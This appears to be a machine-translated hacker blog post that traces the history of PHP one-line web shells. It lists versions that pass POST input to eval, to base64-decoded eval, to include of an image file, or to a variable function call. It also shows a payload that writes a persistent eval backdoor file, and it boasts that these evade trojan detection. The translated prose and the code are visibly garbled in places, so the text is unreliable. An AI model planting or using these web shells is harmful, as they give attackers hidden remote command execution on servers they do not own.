Historical proof: A branch of narrow web security has entered the php era from the asp era. As the operating platform is becoming more diversified from the win series, server Security has also started to spread from windows to Unix/Linux. Security has a long way to go. Any complicated system can't help but think carefully. What's more, a group of people will stare at it all day, therefore, the wisdom of a small number of designers is always inferior to that of the masses. Hundreds of secrets must be sparse. What we can do now is to do a good job at the grass-roots level and work with everyone. Share the collective wisdom to contribute to security.
Security does not have a final solution. It is a dialectical problem. In a game, you seek my defense, and then work hard to build a soft armor.
Worried. To accelerate defense deployment, you must be one step ahead of them!
Why? Reading!
Inside the line, the hacker is admired by the hacker who has full brains.
Code:
<? PHP @ $ _ POST [f] ($ _ POST [w]); exit;?>
W = fwrite (fopen ("a. php", a +), "<? Php eval ($ _ POST [cmd]?;> ");
F = *****
Bytes -------------------------------------------------------------------------------------------
Practice has proved that this is feasible. Alas, there is a long way to go before trojan detection.
Status quo Description: You must be familiar with new languages, understand their security features, and do not be eliminated
Future: ...... just hope not to be eliminated
Historical Review:
Ver 1.0 <? PHP eval ($ _ POST [w]);?>
Ver 1.1 <? PHP @ eval ($ _ POST [w]);?>
Ver 1.2 <? PHP eval (@ base64_decode ($ _ POST [w]);?>
Ver 2.0 <? PHP include xxoo.jpg;?>
Ver 2.0.1 <? PHP require_once xxoo.jpg;?>
Ver 2. 0. * <? PHP ***** xxoo.jpg;?>
Ver 3.0 <? PHP @ $ _ POST [f] ($ _ POST [w]);?>
Ver 3. 0. * <? PHP $ a = @ $ _ POST [f]; $ B = $ _ POST [w]; ......?>
Ver *. * <? PHP/* UNKNOWN */?>
Like taiji, gossip can be born in Vientiane. The idea here is a prompt that it can be expanded quickly.
Ask what will happen in the future. In the words of a Teacher: God knows!
The next server can be used in one sentence, which may be the charm of hack.